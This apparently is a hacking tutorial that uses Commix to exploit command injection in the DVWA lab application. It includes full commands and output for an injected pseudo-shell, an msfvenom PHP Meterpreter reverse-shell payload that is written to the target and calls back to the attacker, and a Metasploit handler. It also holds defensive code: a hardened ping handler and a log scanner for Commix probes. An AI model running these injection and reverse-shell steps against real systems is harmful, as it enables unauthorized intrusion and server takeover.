The ability to execute system commands through a vulnerable web application makes command injection a fertile attack vector for any hacker. Although these vulnerabilities are highly prized, it can take a while to search an entire application for them. Fortunately, there is a useful tool called Commix that can automate this process for us.
What Is Commix
Commix, a portmanteau of Command Injection Exploiter, is an open-source tool used to test web applications for command injection vulnerabilities. It is automated, which makes it easy to identify vulnerable parameters in a fraction of the time manual testing would take.
Commix is written in Python, which means it runs on Linux, Mac and Windows. It is also included in the official repositories of Kali Linux, BlackArch and Parrot Security OS. It works out of the box, and there is even support for custom module development to extend the tool's core functionality.
A variety of options are available, including the ability to specify connection parameters to the host, target enumeration, file access and modification, and even an offline mode. All of these features make Commix a very useful tool when trying to exploit command injection.
In this tutorial we will use Commix and later msfvenom and Metasploit to exploit command injection errors in DVWA.
Method 1: Basic Usage
First open DVWA and sign in with the default credentials.

Next, navigate to DVWA Security and set the security level to low so that exploiting this deliberately vulnerable web application goes smoothly.

Now, go to the Command Execution tab, which is the page of interest for Commix.

For the tool to run successfully, you need the cookie that contains the session ID and security level. Use the Inspect Element tool in your browser to display the request: click "Network" and then "Raw headers" to view this information.
Usage: commix [option(s)]
Options:
-h, --help Show help and exit.
General:
These options relate to general matters.
-v VERBOSE Verbosity level (0-4, default: 0).
--version Show version number and exit.
--output-dir=OUT.. Set a custom output directory path.
-s SESSION_FILE Load a session from a stored (.sqlite) file.
--flush-session Flush the session files for the current target.
--ignore-session Ignore results stored in the session file.
-t TRAFFIC_FILE Log all HTTP traffic into a text file.
--batch Never ask for user input; use the default behaviour.
--encoding=ENCOD.. Force the character encoding used for data retrieval (e.g. GBK).
--charset=CHARSET Time-related injection charset (e.g. "0123456789abcdef").
--check-internet Check the internet connection before assessing the target.
Target:
This option has to be provided to define the target URL.
-u URL, --url=URL Target URL.
--url-reload Reload the target URL after command execution.
-l LOGFILE Parse the target from an HTTP proxy log file.
-m BULKFILE Scan multiple targets given in a text file.
-r REQUESTFILE Load the HTTP request from a file.
--crawl=CRAWLDEPTH Crawl the website starting from the target URL (1-2, default: 0).
-x SITEMAP_URL Parse target(s) from a remote sitemap (.xml) file.
Request:
These options can be used to specify how to connect to the target URL.
-d DATA, --data=.. Data string to be sent through POST.
--host=HOST HTTP Host header.
--referer=REFERER HTTP Referer header.
--user-agent=AGENT HTTP User-Agent header.
--random-agent Use a randomly selected HTTP User-Agent header.
--param-del=PDEL Set the character for splitting parameter values.
--cookie=COOKIE HTTP Cookie header.
--cookie-del=CDEL Set the character for splitting cookie values.
-H HEADER, --hea.. Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').
--headers=HEADERS Extra headers (e.g. 'Accept-Language: fr\nETag: 123').
--proxy=PROXY Use an HTTP proxy (e.g. '127.0.0.1:8080').
--tor Use the Tor network.
--tor-port=TOR_P.. Set the Tor proxy port (default: 8118).
--tor-check Check whether Tor is being used properly.
--auth-url=AUTH_.. Login panel URL.
--auth-data=AUTH.. Login parameters and data.
--auth-type=AUTH.. HTTP authentication type (e.g. 'Basic' or 'Digest').
--auth-cred=AUTH.. HTTP authentication credentials (e.g. 'admin:admin').
--ignore-401 Ignore HTTP error 401 (Unauthorized).
--force-ssl Force the use of SSL/HTTPS.
--ignore-redirects Ignore redirection attempts.
--retries=RETRIES Retries when the connection times out (default: 3).
...
We will use the following options:
- The -u flag defines the target URL.
- The --cookie= option sets the appropriate cookie information.
- The --data= option specifies the POST request string.
commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=ba245268c2d2c08a209bf7db8bd004a0; security=low' --data='ip=127.0.0.1&submit=submit'
The tool launches and displays a banner with some version information, followed by status messages showing its progress. We can see that it finds a parameter vulnerable to command injection and asks whether we want a pseudo-terminal shell.
[Commix v2.6-stable banner]
Answering yes drops us into an interactive command shell. We can now issue commands such as whoami and uname -a to display information about the server.
Pseudo-Terminal (type '?' for available options)
commix(os_shell) > whoami
www-data
commix(os_shell) > uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
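What Commix found here is the DVWA page building a shell command around the ip field it receives. As an added example (not code from the article or from DVWA), the Python below contrasts that pattern with a handler that only accepts a real IP address and runs ping without a shell; the function names and the ping invocation are choices made here, not DVWA's own:

```python
import ipaddress
import subprocess

# Added example, not the article's or DVWA's code. It models the DVWA
# "Command Execution" page exploited above, which pings the `ip` value.

def vulnerable_ping_command(ip: str) -> str:
    # What the low-security page effectively does: the raw value is pasted
    # into a shell command line, so ';' or '$(...)' in it runs extra commands.
    # Returned as a string only for illustration; never hand this to a shell.
    return f"ping -c 3 {ip}"

def hardened_ping_argv(ip: str) -> list:
    # Parse the value as an IP address: hostnames, shell metacharacters and
    # Commix's probe strings all fail here with ValueError.
    addr = ipaddress.ip_address(ip.strip())
    flag = "-6" if addr.version == 6 else "-4"
    # An argv list executed without a shell: nothing gets re-interpreted.
    return ["ping", flag, "-c", "3", str(addr)]

def run_hardened_ping(ip: str) -> str:
    # The handler's entry point: reject bad input before anything runs.
    try:
        argv = hardened_ping_argv(ip)
    except ValueError:
        return "invalid address"
    done = subprocess.run(argv, capture_output=True, text=True, timeout=15)
    return done.stdout
```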
This is certainly useful, but a bare shell only goes so far. Fortunately, there is a way to combine Commix with the powerful msfvenom to get a Meterpreter session on the target.
Method 2: Upload Reverse Shell
Commix has a feature that allows us to write files to the target system. We'll place a reverse shell on the target that calls back to our attacking machine, but before we do that we need to build the payload.
Msfvenom is a payload generator that replaced both msfpayload and msfencode back in 2015. This standalone tool can be used to create payloads outside the Metasploit Framework.
Use the command msfvenom with the following options.
- The -p flag specifies the payload.
- lhost sets the address of the listening host.
- lport sets the listening port.
- The -e flag specifies the encoder.
- The -f flag specifies the output format.
Make sure you use > to write the output to the file payload.php.
root@drd:~# msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.1.100 lport=4321 -e php/base64 -f raw > payload.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1507 (iteration=0)
php/base64 chosen with final size 1507
Payload size: 1507 bytes
The payload was created successfully. Now all we have to do is add the PHP tags to our file. Enter nano payload.php, add <?php at the beginning of the file and ?> at the end, then press Ctrl-X, Y, and Enter to save.
Now we have to open a handler on our machine to catch the session that will be opened from the target. Start Metasploit in a new terminal window by typing msfconsole. After it loads, enter use exploit/multi/handler to load the general purpose handler.
Next, set the payload, listening address, and port that we specified earlier in our file.
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 172.16.1.100
lhost => 172.16.1.100
msf exploit(multi/handler) > set lport 4321
lport => 4321
Once these are set, start the handler by typing run, an alias of exploit.
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.1.100:4321
Back in our other terminal, we can add a few more options to deliver our payload to the target:
- The --file-write option specifies the file to use on our local machine.
- The --file-dest option sets the destination path on the target.
- The --os-cmd option specifies the command to execute once the file has been written to the destination.
commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=ba245268c2d2c08a209bf7db8bd004a0; security=low' --data='ip=127.0.0.1&submit=submit' --file-write='/root/payload.php' --file-dest='/var/www/payload.php' --os-cmd='php -f /var/www/payload.php'
This runs our payload, which should open a session with our handler if everything works properly. Commix takes a moment to run and finally reports that our file was created successfully on the target.
[*] Testing the (results-based) classic command injection technique... [ SUCCEED ]
[+] The POST parameter 'ip' seems injectable via the (results-based) classic command injection technique.
[~] Payload: echo YJOSPV$((42+12))$(echo YJOSPV)YJOSPV
[+] The file /var/www/payload.php was created successfully!
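The probe Commix reports above has a recognisable shape that a request-logging layer or WAF can match on. As an added example (not from the article or the Commix project), the Python below scans constructed request records in the form "client path post-body" for that probe and for generic shell metacharacters in parameter values; the record format, the function names and the sample lines are all assumptions made here:

```python
import re
from typing import Optional
from urllib.parse import parse_qs

# Added example, not from the article or Commix. It looks for the shape of
# Commix's results-based probe: echo MARK$((a+b))$(echo MARK)MARK, where the
# same marker appears three times around an arithmetic expansion.
COMMIX_PROBE = re.compile(
    r"echo\s+([A-Za-z0-9]{4,})\$\(\(\d+\+\d+\)\)\$\(echo\s+\1\)\1"
)
# Anything that could chain or substitute a command inside a shell string.
SHELL_META = re.compile(r"[;&|`\n]|\$\(|\$\{")

def classify_value(value: str) -> Optional[str]:
    """Label one already-decoded parameter value, or None if it looks benign."""
    if COMMIX_PROBE.search(value):
        return "commix-results-based-probe"
    if SHELL_META.search(value):
        return "shell-metacharacters"
    return None

def scan_request_log(lines: list) -> list:
    """Return (client, parameter, label) for every suspicious parameter."""
    findings = []
    for line in lines:
        client, _path, body = line.split(" ", 2)
        # parse_qs percent-decodes values and turns '+' into spaces.
        for name, values in parse_qs(body, keep_blank_values=True).items():
            for value in values:
                label = classify_value(value)
                if label:
                    findings.append((client, name, label))
    return findings

# Constructed sample records against DVWA's exec page; the first is benign,
# the second carries the probe shown above, the third a plain '|' chain.
SAMPLE_LOG = [
    "10.0.0.5 /dvwa/vulnerabilities/exec/ ip=127.0.0.1&submit=submit",
    "10.0.0.9 /dvwa/vulnerabilities/exec/ "
    "ip=127.0.0.1%3Becho+YJOSPV%24%28%2842%2B12%29%29%24%28echo+YJOSPV%29YJOSPV&submit=submit",
    "10.0.0.9 /dvwa/vulnerabilities/exec/ ip=127.0.0.1%7Cid&submit=submit",
]
```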
Now we can see in the other terminal that a Meterpreter session has been opened. We can execute commands such as getuid and sysinfo to display information about the target.
[*] Sending stage (37775 bytes) to 172.16.1.102
[*] Meterpreter session 1 opened (172.16.1.100:4321 -> 172.16.1.102:40115) at 2018-10-18 11:29:19 -0500
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/linux
These are similar results to what we got using Commix alone, but now that we have a Meterpreter session, we have much more flexibility in what we can ultimately do.
Conclusion
Hackers go after command injection vulnerabilities because of the power they grant over the target system. Commix is a very useful tool that automates the process of finding and exploiting these vulnerabilities, making life a little easier for the hacker.
In this guide, we covered some basic usage options. We also saw how to combine msfvenom with Commix to upload a payload to the target and get a shell. This flexibility makes Commix an excellent addition to any hacker's arsenal.
Title image by Jarmoluk/Pixabay; screenshots by drd_/Null Byte